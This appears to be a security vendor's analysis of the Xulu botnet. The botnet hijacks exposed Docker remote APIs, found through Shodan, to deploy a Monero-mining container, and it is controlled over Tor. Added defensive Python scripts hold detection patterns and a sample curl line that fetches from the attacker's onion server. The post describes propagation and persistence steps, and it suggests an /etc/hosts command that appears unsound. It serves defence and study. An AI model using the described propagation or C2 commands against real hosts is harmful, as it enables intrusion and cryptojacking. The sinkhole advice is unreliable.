Xulu: Cryptojacking Leveraging Shodan, Tor, and Malicious Docker Container

Earlier this month, we detected a mining botnet that deploys malicious Docker containers on victim hosts by exploiting unauthenticated access to the Docker remote API. We have named the botnet "Xulu" because that string is used as the username in the botnet's mining configuration.

Xulu is not the first botnet to target Docker, but it differs from the others in that it does not scan for other hosts itself. Instead it uses an OSINT (open-source intelligence) technique, dynamically querying Shodan for lists of possible victims.

It also places its control server on the Tor network, probably in an effort to hide the operator behind the botnet.


Malicious Docker Images that Mine Monero

A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another.

This definition from docker.com explains what a Docker container is. As microservices continue to gain popularity, more enterprises use containers to deploy applications, yet container security is often overlooked, and exposed Docker services become an easy target for exploitation.

While investigating the Xulu botnet, we noticed that containers created from the malicious "zoolu2/auto" Docker image appear on compromised hosts.


The containers run the processes shown in the original post's screenshot, among which the mining process is easy to pick out.

Since miningpoolhub .com does not publish payment data for its users, we do not know how much profit the threat actor has made from cryptojacking.

Botnet Propagation and Persistence

The Xulu botnet propagates itself with OSINT techniques and the Tor network.

To begin with, the botnet uses http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion as its control server. The ".onion" suffix indicates that it is an anonymous onion service (a.k.a. "hidden service") reachable only via the Tor network.


The botnet also runs /toolbin/shodaemon as its main daemon process.


From the script we can see that it first generates /search.txt by combining the content of the remote file http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion/shodan.txt with the local file /toolbin/hcode.txt.


Each file contains a list of Shodan queries, which /toolbin/shodan then reads and submits to Shodan.

The queries return the IP addresses of hosts with the Docker port (2375) open to the Internet. Not all of them are vulnerable, but by using Shodan's data the threat actor saves a great deal of mass-scanning work.


After removing duplicates, the compromised host sends a "docker run" command to each collected IP address. On any host whose Docker remote API accepts unauthenticated requests, the malicious zoolu2/auto container is then deployed.


In addition, the botnet downloads and executes a script from http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion/bnet1.txt for persistence.
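As an added example (not code from the original post), here is a small host-side triage script that checks `docker ps` and `ps` output for the indicators named above: the zoolu2/auto image, the /toolbin/shodaemon and /toolbin/shodan binaries, and the onion control server. The docker ps and ps samples are constructed; on a real host, feed it the output of `docker ps --format '{{json .}}'` and `ps -eo pid,args`.

```python
import json
from typing import Dict, List, Tuple

# Indicators taken from the post: the malicious image, its daemon binaries, the C2 host.
XULU_IMAGE = "zoolu2/auto"
XULU_PATHS = ("/toolbin/shodaemon", "/toolbin/shodan")
XULU_C2 = "wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion"

# Constructed sample shaped like `docker ps --format '{{json .}}'`: one benign
# container and one created from the Xulu image.
SAMPLE_DOCKER_PS = """\
{"ID":"a1b2c3d4e5f6","Image":"nginx:1.17","Names":"web","Command":"nginx -g 'daemon off;'"}
{"ID":"0f1e2d3c4b5a","Image":"zoolu2/auto","Names":"eager_turing","Command":"/bin/sh -c /toolbin/shodaemon"}
"""

# Constructed sample shaped like `ps -eo pid,args` output.
SAMPLE_PS = """\
  PID COMMAND
    1 /sbin/init
  412 /usr/bin/dockerd -H fd://
 2231 /toolbin/shodaemon
 2240 curl -s http://wg6kw72fqds5n2q2x6qjejenrskg6i3dywe7xrcselhbeiikoxfrmnqd.onion/shodan.txt
"""

def suspicious_containers(docker_ps_json_lines: str) -> List[Dict[str, str]]:
    """Return containers whose image or command matches the Xulu indicators."""
    hits = []
    for line in docker_ps_json_lines.splitlines():
        if not line.strip():
            continue
        c = json.loads(line)
        image, cmd = c.get("Image", ""), c.get("Command", "")
        if image.startswith(XULU_IMAGE) or any(p in cmd for p in XULU_PATHS):
            hits.append({"id": c["ID"], "image": image, "command": cmd})
    return hits

def suspicious_processes(ps_output: str) -> List[Tuple[int, str]]:
    """Return (pid, args) for processes that reference the Xulu binaries or C2."""
    hits = []
    for line in ps_output.splitlines()[1:]:  # first line is the ps header
        pid_str, _, args = line.strip().partition(" ")
        if pid_str.isdigit() and (any(p in args for p in XULU_PATHS) or XULU_C2 in args):
            hits.append((int(pid_str), args))
    return hits

if __name__ == "__main__":
    print(suspicious_containers(SAMPLE_DOCKER_PS))
    print(suspicious_processes(SAMPLE_PS))
```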


Scale of Attack and Security Recommendations

On https://hub.docker.com, the malicious Docker image mentioned above has been downloaded more than 10k times.


The author of the Xulu botnet appears to be actively developing variants of it.


This activity was also observed by a Docker user, Caprico1, and discussed on Docker's GitHub: https://github.com/docker/hub-feedback/issues/1809

By the time this article was published, Docker's engineers had disabled the zoolu2 account.


To avoid becoming a victim of malicious intrusion and mining, we have the following recommendations:

  • Services for internal use (e.g. Docker) should not be exposed to the Internet. Use adequate ACLs or another authentication mechanism so that only trusted users can reach them.
  • Since hidden services have been used by many botnets, users who rarely need them can use a few tricks to drop packets to and from them. On Linux, for example, you can run: echo -e "\n0.0.0.0 .onion" >> /etc/hosts This command sinkholes (redirects) any traffic to and from hidden services.
  • Cloud firewalls are useful in preventing attacks. We recommend Alibaba Cloud Firewall because it can detect, block and analyze threats, and its AI-based capabilities help protect you from intrusion and malicious mining.
  • Alibaba Cloud Managed Security Service lets users call on the expertise of Alibaba's security specialists, who will help you clean up malware, improve configurations, and enhance overall security. If you are concerned about your organization's security, you should give it a try.
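To make the first recommendation concrete, here is an added example (not from the original post) that checks whether a Docker daemon's configuration exposes the remote API the way Xulu needs it: a TCP listener on a non-loopback address without client-certificate verification. Both daemon.json documents are constructed; the tls* keys are real daemon.json options and the certificate paths are placeholders.

```python
import json
import shlex
from typing import List
from urllib.parse import urlsplit

# Constructed weak configuration: the API on every interface with no TLS,
# which is exactly what Xulu's "docker run" propagation needs.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'

# Constructed hardened configuration: client-certificate verification on a
# private address. The tls* keys are real daemon.json options; the paths are placeholders.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""

def hosts_from_cmdline(cmdline: str) -> List[str]:
    """Collect -H / --host values from a dockerd command line."""
    argv = shlex.split(cmdline)
    hosts = []
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
    return hosts

def exposure_findings(daemon_json: str, cmdline: str = "dockerd") -> List[str]:
    """One finding per TCP listener reachable from the network without client
    certificate verification (hosts from daemon.json and the command line are merged)."""
    cfg = json.loads(daemon_json)
    hosts = list(cfg.get("hosts", [])) + hosts_from_cmdline(cmdline)
    # "tls": true alone only encrypts; only tlsverify authenticates the client.
    tls_verify = bool(cfg.get("tlsverify", False)) or "--tlsverify" in shlex.split(cmdline)
    findings = []
    for h in hosts:
        u = urlsplit(h)
        if u.scheme != "tcp" or u.hostname in ("127.0.0.1", "localhost", "::1"):
            continue  # unix://, fd:// and loopback listeners are not Internet-reachable
        if not tls_verify:
            findings.append(f"{h}: remote API accepts unauthenticated calls")
    return findings

if __name__ == "__main__":
    print(exposure_findings(WEAK_DAEMON_JSON))      # one finding
    print(exposure_findings(HARDENED_DAEMON_JSON))  # []
```

Note that dockerd itself refuses to start when hosts are set both in daemon.json and with -H; the merge above only makes the check tolerant of either style.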

IOC

Control Server:

URL:

Pool:

Md5:

Reference

https://twitter.com/Suprn8/status/1129877707897081856

https://www.alibabacloud.com/blog/dockerkiller-threat-analysis-first-instance-of-batch-attack-and-exploitation-of-docker-services_593947

Reference: https://www.alibabacloud.com/blog/xulu-cryptojacking-leveraging-shodan-tor-and-malicious-docker-container_594869?spm=a2c41.12952014.0.0
